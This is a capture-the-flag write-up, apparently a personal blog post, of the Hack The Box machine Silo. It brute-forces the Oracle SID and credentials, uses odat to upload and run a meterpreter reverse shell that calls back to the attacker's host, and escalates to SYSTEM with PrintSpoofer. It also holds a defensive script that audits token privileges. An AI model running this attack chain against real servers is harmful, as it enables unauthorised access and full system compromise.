Port scanning

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.82
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 10:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.065s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 10.40 seconds
┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo nmap -sT -sC -sV -O -p80,135,139,445,1521,5985.47001 10.10.10.82
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 10:16 CST
Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo nmap -sT -sC -sV -O -p80,135,139,445,1521,5985,47001 10.10.10.82
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 10:17 CST
Nmap scan report for 10.10.10.82
Host is up (0.065s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Vista SP1 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 R2 (94%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10m55s, deviation: 0s, median: -10m56s
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-25T02:06:29
|_ start_date: 2024-09-25T01:59:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.04 seconds

Oracle

Port 80 and SMB give nothing useful, so attention turns to Oracle on 1521. The scan reports version 11.2, so the SID can be brute-forced.

In an Oracle database, the SID (System Identifier) is a unique identifier for one particular database instance. When an Oracle instance starts, the system assigns it a SID, and clients use that SID to connect to the correct instance.

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 10.10.10.82 oracle-sid
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-25 10:46:39
[DATA] max 16 tasks per 1 server, overall 16 tasks, 576 login tries (l:576/p:1), ~36 tries per task
[DATA] attacking oracle-sid://10.10.10.82:1521/
[1521][oracle-sid] host: 10.10.10.82 login: XE
[1521][oracle-sid] host: 10.10.10.82 login: PLSExtProc
[STATUS] 555.00 tries/min, 555 tries in 00:01h, 21 to do in 00:01h, 16 active
[1521][oracle-sid] host: 10.10.10.82 login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-25 10:47:42

If extra modules need to be installed for Oracle pentesting, see:

https://secybr.com/posts/oracle-pentesting-best-practices/

Here I just used odat directly.

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login brio_admin has already been tested at least once. What do you want to do: | ETA: 00:06:17
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:06:22
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:06:09
[!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:05:49
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:04:46
[!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:03:45
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password | ETA: 00:02:57
[!] Notice: 'outln' account is locked, so skipping this username for password | ETA: 00:02:39
[+] Valid credentials found: scott/tiger. Continue... ##### | ETA: 00:01:28

A valid pair of credentials was found for the XE SID; log in with it.

┌──(mikannse㉿kali)-[~]
└─$ sqlplus scott@10.10.10.82

SQL*Plus: Release 19.0.0.0.0 - Production on Wed Sep 25 14:45:12 2024
Version 19.6.0.0.0

Copyright (c) 1982, 2019, Oracle. All rights reserved.

Enter password:

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO

The current user has no special privileges, but we can try logging in as sysdba, i.e. with administrator rights.

┌──(mikannse㉿kali)-[~]
└─$ sqlplus scott@10.10.10.82 as sysdba

SQL*Plus: Release 19.0.0.0.0 - Production on Wed Sep 25 15:00:17 2024
Version 19.6.0.0.0

Copyright (c) 1982, 2019, Oracle. All rights reserved.

Enter password:

Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES NO

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_EXECUTE_ROLE YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS HS_ADMIN_SELECT_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDB_SET_INVOKER YES YES NO
SYS XDB_WEBSERVICES YES YES NO
SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO
SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO

32 rows selected.

Now we have administrator privileges.

Looking at the odat wiki, there is a very powerful module: https://github.com/quentinhardy/odat/wiki/externaltable

It can fetch an executable remotely and run it, so a meterpreter reverse shell can be generated and executed directly to get a shell; combined with the utlfile module, it can be used to upload files to the server.

[1] (10.10.10.82:1521): Put the /home/mikannse/HTB/silo/shell.exe local file in the c:/windows/temp folder like shell.exe on the 10.10.10.82 server
[+] The /home/mikannse/HTB/silo/shell.exe file was created on the c:/windows/temp directory on the 10.10.10.82 server like the shell.exe file
┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ odat externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec "c:/windows/temp" shell.exe

[1] (10.10.10.82:1521): Execute the shell.exe command stored in the c:/windows/temp path

Shell obtained.

Privilege escalation

msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.29:443
[*] Sending stage (201798 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.29:443 -> 10.10.10.82:49163) at 2024-09-25 15:41:47 +0800

meterpreter >
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled

The token has SeImpersonatePrivilege; this is as good as done.
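The hardening-review counterpart of the `whoami /priv` check above, as an added example that is not part of the original writeup: a Python helper that parses the command's table output and reports which privileges on a service account's token a review should question. The sample input is a constructed excerpt in the same layout as the listing above (real output pads the columns with more spaces), and the set of privileges treated as high-risk is a judgement made for this example, not an official list.

```python
# Audit helper for `whoami /priv` output. Added example, not part of the
# original writeup. Flags privileges a database service account normally has
# no business holding, so an operator can review the account the service runs
# under. The HIGH_RISK set below is this example's own judgement.

# Constructed excerpt in the layout `whoami /priv` prints (values mirror the
# listing above).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled
SeTcbPrivilege                  Act as part of the operating system       Enabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeDebugPrivilege                Debug programs                            Enabled
SeBackupPrivilege               Back up files and directories             Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled
"""

# Privileges whose holder can act outside its own security context. The
# reported state is shown but not trusted: a "Disabled" privilege is still
# present on the token and a process can re-enable it with
# AdjustTokenPrivileges, so presence is what matters for the review.
HIGH_RISK = {
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeDebugPrivilege": "open and debug any process, including SYSTEM ones",
    "SeImpersonatePrivilege": "impersonate clients that connect to the process",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeTcbPrivilege": "act as part of the operating system",
}


def parse_whoami_priv(text):
    """Return {privilege name: state} parsed from `whoami /priv` output."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("===="):
            in_table = True          # the ==== rule separates header from rows
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        # Name is the first column and state the last; the description in
        # between contains spaces, so fixed column widths are not relied on.
        privs[parts[0]] = parts[-1]
    return privs


def high_risk_privileges(privs):
    """Subset of `privs` present in HIGH_RISK, whatever their current state."""
    return {name: state for name, state in privs.items() if name in HIGH_RISK}


def report(privs):
    """One finding line per high-risk privilege, sorted by name."""
    return [f"{name} ({state}): {HIGH_RISK[name]}"
            for name, state in sorted(high_risk_privileges(privs).items())]


if __name__ == "__main__":
    for finding in report(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(finding)
```

Feeding the real listing above through it would flag SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeDebugPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege and SeLoadDriverPrivilege on the Oracle service token; the fix on the defending side is running the database service under an account that does not carry them.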

meterpreter > upload /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe
[*] Uploading : /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe -> PrintSpoofer64.exe
[*] Uploaded 26.50 KiB of 26.50 KiB (100.0%): /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe -> PrintSpoofer64.exe
[*] Completed : /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe -> PrintSpoofer64.exe

All in, one shot.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>PrintSpoofer64.exe -i -c cmd.exe
PrintSpoofer64.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Afterthoughts

First time going up against Oracle; ready-made tools really are convenient. I'll study Oracle properly when I have time.